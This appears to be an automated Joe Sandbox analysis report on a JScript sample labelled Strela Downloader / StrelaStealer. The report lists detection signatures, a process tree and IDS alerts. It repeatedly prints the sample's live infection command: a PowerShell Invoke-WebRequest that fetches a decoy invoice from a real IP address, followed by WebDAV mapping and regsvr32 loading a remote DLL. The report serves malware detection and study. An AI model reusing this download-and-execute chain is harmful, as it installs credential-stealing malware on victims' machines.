Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1475127682155276.js

Overview

General Information

Sample name:1475127682155276.js
Analysis ID:1591624
MD5:453599a731336818e0b53408cc447545
SHA1:f887fc09c17d9b2fc6e1a9306017c31c5bcc7d72
SHA256:22b518169a28cf8a86401430ef8812a420bb256ee20473c18d87e07295befe0f
Tags:jsStrelaStealeruser-cocaman
Infos:

Detection

Strela Downloader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

JScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for submitted file
Sigma detected: Powershell launch regsvr32
Suricata IDS alerts for network traffic
Yara detected Strela Downloader
Downloads files with wrong headers with respect to MIME Content-Type
Gathers information about network shares
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses known network protocols on non-standard ports
Windows Scripting host checks user region and language preferences
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Cscript/Wscript Potentially Suspicious Child Process
Sigma detected: Potential DLL File Download Via PowerShell Invoke-WebRequest
Sigma detected: PowerShell Script Run in AppData
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • wscript.exe (PID: 320 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1475127682155276.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 6396 cmdline: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1868 cmdline: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • Acrobat.exe (PID: 1848 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\invoice.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
        • AcroCEF.exe (PID: 7184 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • AcroCEF.exe (PID: 7396 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1680,i,15353841458623981023,14574021241036116658,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • cmd.exe (PID: 7064 cmdline: cmd /c net use \\193.143.1.205@8888\davwwwroot\ MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • net.exe (PID: 3720 cmdline: net use \\193.143.1.205@8888\davwwwroot\ MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
  • svchost.exe (PID: 7248 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: wscript.exe PID: 320JoeSecurity_StrelaDownloaderYara detected Strela DownloaderJoe Security

    System Summary

    barindex
    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6396, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", ProcessId: 1868, ProcessName: powershell.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6396, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", ProcessId: 1868, ProcessName: powershell.exe
    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1475127682155276.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1475127682155276.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1475127682155276.js", ProcessId: 320, ProcessName: wscript.exe
    Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 193.143.1.205, DestinationIsIpv6: false, DestinationPort: 8888, EventID: 3, Image: C:\Windows\System32\net.exe, Initiated: true, ProcessId: 3720, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49705
    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): Data: Command: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1475127682155276.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 320, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll, ProcessId: 6396, ProcessName: cmd.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Hieu Tran: Data: Command: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1475127682155276.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 320, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll, ProcessId: 6396, ProcessName: cmd.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1475127682155276.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 320, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll, ProcessId: 6396, ProcessName: cmd.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1475127682155276.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 320, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll, ProcessId: 6396, ProcessName: cmd.exe
    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6396, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", ProcessId: 1868, ProcessName: powershell.exe
    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1475127682155276.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 320, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll, ProcessId: 6396, ProcessName: cmd.exe
    Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1475127682155276.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1475127682155276.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1475127682155276.js", ProcessId: 320, ProcessName: wscript.exe
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6396, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", ProcessId: 1868, ProcessName: powershell.exe
    Source: Process startedAuthor: frack113: Data: Command: net use \\193.143.1.205@8888\davwwwroot\, CommandLine: net use \\193.143.1.205@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: cmd /c net use \\193.143.1.205@8888\davwwwroot\, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7064, ParentProcessName: cmd.exe, ProcessCommandLine: net use \\193.143.1.205@8888\davwwwroot\, ProcessId: 3720, ProcessName: net.exe
    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7248, ProcessName: svchost.exe
    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: net use \\193.143.1.205@8888\davwwwroot\, CommandLine: net use \\193.143.1.205@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: cmd /c net use \\193.143.1.205@8888\davwwwroot\, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7064, ParentProcessName: cmd.exe, ProcessCommandLine: net use \\193.143.1.205@8888\davwwwroot\, ProcessId: 3720, ProcessName: net.exe

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1475127682155276.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 320, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll, ProcessId: 6396, ProcessName: cmd.exe
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-15T08:13:08.891125+010028595601Malware Command and Control Activity Detected192.168.2.549704193.143.1.20580TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-15T08:13:11.279119+010018100051Potentially Bad Traffic192.168.2.549705193.143.1.2058888TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-15T08:13:08.891125+010018100002Potentially Bad Traffic192.168.2.549704193.143.1.20580TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: 1475127682155276.jsVirustotal: Detection: 9%Perma Link

    Software Vulnerabilities

    barindex
    Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

    Networking

    barindex
    Source: Network trafficSuricata IDS: 1810005 - Severity 1 - Joe Security ANOMALY Microsoft Office WebDAV Discovery : 192.168.2.5:49705 -> 193.143.1.205:8888
    Source: Network trafficSuricata IDS: 2859560 - Severity 1 - ETPRO MALWARE StrelaStealer CnC Activity - Requesting Decoy Payload (GET) : 192.168.2.5:49704 -> 193.143.1.205:80
    Source: httpBad PDF prefix: HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Wed, 15 Jan 2025 07:13:08 GMT Content-Type: application/pdf Transfer-Encoding: chunked Connection: keep-alive X-Frame-Options: SAMEORIGIN Data Raw: 31 66 36 61 0d 0a 25 50 44 46 2d 31 2e 37 0a 25 bf f7 a2 fe 0a 31 20 30 20 6f 62 6a 0a 3c 3c 20 2f 50 61 67 65 73 20 33 20 30 20 52 20 2f 54 79 70 65 20 2f 43 61 74 61 6c 6f 67 20 3e 3e 0a 65 6e 64 6f 62 6a 0a 32 20 30 20 6f 62 6a 0a 3c 3c 20 2f 54 79 70 65 20 2f 4f 62 6a 53 74 6d 20 2f 4c 65 6e 67 74 68 20 35 36 20 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 20 2f 4e 20 31 20 2f 46 69 72 73 74 20 34 20 3e 3e 0a 73 74 72 65 61 6d 0a 78 9c 33 56 30 e0 b2 b1 51 d0 77 ce 2f cd 2b 51 30 54 d0 f7 ce 4c 29 56 88 56 30 51 30 50 08 52 88 55 d0 0f a9 2c 48 55 d0 0f 48 4c 4f 2d 56 b0 b3 e3 02 00 25 30 0c 6d 65 6e 64 73 74 72 65 61 6d 0a 65 6e 64 6f 62 6a 0a 34 20 30 20 6f 62 6a 0a 3c 3c 20 2f 43 6f 6e 74 65 6e 74 73 20 35 20 30 20 52 20 2f 47 72 6f 75 70 20 3c 3c 20 2f 43 53 20 2f 44 65 76 69 63 65 52 47 42 20 2f 49 20 74 72 75 65 20 2f 53 20 2f 54 72 61 6e 73 70 61 72 65 6e 63 79 20 2f 54 79 70 65 20 2f 47 72 6f 75 70 20 3e 3e 20 2f 4d 65 64 69 61 42 6f 78 20 5b 20 30 20 30 20 35 39 34 2e 39 36 20 38 34 30 2e 39 36 20 5d 20 2f 50 61 72 65 6e 74 20 33 20 30 20 52 20 2f 52 65 73 6f 75 72 63 65 73 20 36 20 30 20 52 20 2f 53 74 72 75 63 74 50 61 72 65 6e 74 73 20 30 20 2f 54 79 70 65 20 2f 50 61 67 65 20 3e 3e 0a 65 6e 64 6f 62 6a 0a 35 20 30 20 6f 62 6a 0a 3c 3c 20 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 20 2f 4c 65 6e 67 74 68 20 37 35 20 3e 3e 0a 73 74 72 65 61 6d 0a 78 9c 33 54 30 00 42 5d 43 20 61 61 62 a0 67 69 a6 90 9c cb 55 c8 65 a8 00 82 45 e9 0a fa 89 06 0a e9 c5 5c 20 45 a6 96 26 40 79 43 a8 3a a0 6c aa 42 1a 57 a0 42 21 50 39 44 95 82 7e 85 b9 82 4b 3e 57 20 10 02 00 26 99 12 f1 65 6e 64 73 74 72 65 61 6d 0a 65 6e 64 6f 62 6a 0a 36 20 30 20 6f 62 6a 0a 3c 3c 20 2f 45 78 74 47 53 74 61 74 65 20 3c 3c 20 2f 61 30 20 3c 3c 20 2f 43 41 20 31 20 2f 63 61 20 31 20 3e 3e 20 3e 3e 20 2f 58 4f 62 6a 65 63 74 20 3c 3c 20 2f 78 37 20 37 20 30 20 52 20 3e 3e 20 3e 3e 0a 65 6e 64 6f 62 6a 0a 37 20 30 20 6f 62 6a 0a 3c 3c 20 2f 42 42 6f 78 20 5b 20 30 20 30 20 35 39 35 20 38 34 31 20 5d 20 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 20 2f 52 65 73 6f 75 72 63 65 73 20 38 20 30 20 52 20 2f 53 75 62 74 79 70 65 20 2f 46 6f 72 6d 20 2f 54 79 70 65 20 2f 58 4f 62 6a 65 63 74 20 2f 4c 65 6e 67 74 68 20 35 39 20 3e 3e 0a 73 74 72 65 61 6d 0a 78 9c 2b e4 0a 54 28 e4 d2 4f 2f 36 50 48 2f e6 2a e4 32 b5 34 d1 b3 34 53 30 00 42 5d 0b 13 03 08 1b ca 48 ce e5 d2 4f 04 a9 53 d0 af 30 34 54 70 c9 e7 0a 04 42 00 f1 ec 0e 9e 65 6e 64 73 74 72 65 61 6d 0a 65 6e 64 6f 62 6a 0a 38 20 30 20 6f 62 6a 0a 3c 3c 20 2f 45 78 74 47 53 74 61 74 65 20 3c 3c 20 2f 61 30 20 3c 3c 20 2f 43 41 20 31 20 2f 63 61 20 31 20 3e 3e 20 2f 67 73 30 20 3c 3c 20 2f 42 4d 20 2f 4e 6f 72 6d 61 6c 20 2f 43 41 20 31 2e 30 20 2f 53 4d 61 73 6b 20 2f 4e 6f 6e 65 20 2f 6
    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 8888
    Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49705
    Source: global trafficTCP traffic: 192.168.2.5:49705 -> 193.143.1.205:8888
